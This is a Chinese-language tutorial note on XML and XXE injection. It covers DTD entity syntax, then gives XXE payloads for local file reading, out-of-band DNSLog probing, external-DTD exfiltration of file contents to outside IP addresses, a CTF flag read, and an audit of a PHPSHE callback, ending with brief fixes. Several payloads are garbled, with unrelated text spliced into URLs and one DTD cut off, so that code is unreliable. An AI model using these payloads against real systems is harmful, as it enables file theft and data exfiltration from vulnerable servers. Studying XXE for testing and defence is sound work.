XML、XXE知识点

XML被设计为传输和存储数据，XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection，即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

1.XML和XXE区别

XML 被设计为传输和存储数据，XML 文档结构包括 XML 声明、DTD 文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从 HTML 分离，是独立于软件和硬件的信息传输工具。

XXE 漏洞全称XML External Entity Injection，即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XML 与 HTML 的主要差异：

XML 被设计为传输和存储数据，其焦点是数据的内容。

HTML 被设计用来显示数据，其焦点是数据的外观。

HTML 旨在显示信息 ，而 XML 旨在传输信息。

DTD简介：

XML文档类型声明(通常称为DTD)是一种精确描述XML语言的方法。 DTD根据相应XML语言的语法规则检查XML文档的结构和词汇的有效性

1. 实体声明语法

通常，实体可以在内部或外部声明。 让我们了解以下各项及其语法如下 -

1.1. 内部实体

如果在DTD中声明实体，则称为内部实体。语法

以下是内部实体声明的语法 -

<!ENTITY entity_name "entity_value">XML

在上面的语法中 -

• entity_name是实体的名称，后跟双引号或单引号中的值。
• entity_value保存实体名称的值。
• 通过向实体名称(即&entity_name)添加前缀&来取消引用内部实体的实体值。

示例

以下是内部实体声明的示例 -

<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>

<!DOCTYPE address [

<!ELEMENT address (#PCDATA)>

<!ENTITY name "Max su">

<!ENTITY company "Yiibai">

<!ENTITY phone_no "(086) 123-4567890"> ]>

<address> &name; &company; &phone_no; </address>XML

在上面的示例中，各个实体名称 - name，company和phone_no由它们在XML文档中的值替换。 通过向实体名称添加前缀&来取消引用实体值。

将此文件另存为sample.xml，并在浏览器中打开它，注意可以看到：name，company，phone_no的实体值都被替换。

1.2. 外部实体

如果在DTD之外声明实体，则称为外部实体。 可以使用系统标识符或公共标识符来引用外部实体。

语法

以下是外部实体声明的语法 -

<!ENTITY name SYSTEM "URI/URL"> XML

在上面的语法中 -

• name - 是实体的名称。
• SYSTEM - 是关键字。
• URI/URL - 是双引号或单引号中包含的外部源的地址。

类型

可以通过以下方式引用外部DTD：

• 系统标识符 - 系统标识符可以指定包含DTD声明的外部文件的位置。如上所见，它包含关键字SYSTEM和指向文档位置的URI引用。
• 语法如下 - <!DOCTYPE name SYSTEM "address.dtd" [...]>XML
• 公共标识符 - 公共标识符提供了一种定位DTD资源的机制，如下所示 -

如您所见，它以关键字PUBLIC开头，后跟专用标识符。 公共标识符用于标识目录中的条目。 公共标识符可以遵循任何格式; 但是，常用的格式称为正式公共标识符或FPI。<!DOCTYPE name PUBLIC "-//Beginning XML//DTD Address Example//EN">XML

示例

通过以下示例了解外部实体 -

<?xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>

<!DOCTYPE address SYSTEM "address.dtd">

<address>

<name> Max Su </name>

<company> Yiibai Yiibai </company>

<phone> (086) 123-4567890

</phone>

</address>XML

以下是DTD文件address.dtd 的内容 -

<!ELEMENT address (name, company, phone)><!ELEMENT name (#PCDATA)>

<!ELEMENT company (#PCDATA)><!ELEMENT phone (#PCDATA)> 

XXE修复防御方案：

#XML&XXE-黑盒-原理&探针&利用&玩法等

参考：https://www.cnblogs.com/20175211lyz/p/11413335.html

1、读取文件：

<?xml version="1.0"?>

<!DOCTYPE Mikasa [

<!ENTITY test SYSTEM "file:///d:/1.txt">

]>

<user><username>&test;</username><password>Mikasa</password></user>

1.1、带外测试(DNSLog Platform)远程加载远程文件：

<?xml version="1.0" ?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://z8yqum.dnslog.cn.cn">

%file;

]>

<user><username>&send;</username><password>Mikasa</password></user>

2、外部引用实体dtd：

1. 解决拦截防护绕过问题
2. 解决数据不回显问题

<?xml version="1.0" ?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">

%file;

]>

<user><username>&send;</username><password>Mikasa</password></user>

evil2.dtd

<!ENTITY send SYSTEM "file:///d:/e.txt">

3、无回显读文件

当代码中注释掉回显的代码时：

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/1.txt">

<!ENTITY % remote SYSTEM "大飞先生_欢迎光临test.dtd">

%remote;

%all;

]>

<root>&send;</root>

test.dtd

<!ENTITY % all "<!ENTITY send SYSTEM '> normalLink \tdfu http://47.94.236.117/get.php?file=%file;'>>'>http://43.143.231.203:666/get.php?file=%file;'>">

4、其他玩法（协议）-见参考地址

#XML&XXE-前端-CTF&Jarvisoj&探针&利用

http://web.jarvisoj.com:9882/

XXE黑盒发现：

1、获取得到Content-Type或数据类型为xml时，尝试进行xml语言payload进行测试

2、不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe

流程：功能分析-前端提交-源码&抓包-构造Paylod测试

更改请求数据格式：Content-Type

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY f SYSTEM "file:///home/ctf/flag.txt">

]>

<x>&f;</x>

#XML&XXE-白盒-CMS&PHPSHE&无回显审计

审计流程：

1、漏洞函数simplexml_load_string

2、pe_getxml函数调用了漏洞函数

3、wechat_getxml调用了pe_getxml

4、notify_url调用了wechat_getxml

访问notify_url文件触发wechat_getxml函数,构造Paylod测试

先尝试读取文件，无回显后带外测试：

<?xml version="1.0" ?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">

%file;

]>

<user><username>&send;</username><password>Mikasa</password></user>

然后带外传递数据解决无回显：

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/e.txt">

<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">

%remote;

%all;

]>

<root>&send;</root>

test.dtd：

<!ENTITY % all "<!ENTITY send SYSTEM '大飞先生_欢迎光临欢迎欢迎http://43.143.231.203:666/ormalLink \tdfuhttp://

XXE修复防御方案：

-方案1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python：

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

-方案2-过滤用户提交的XML数据

过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC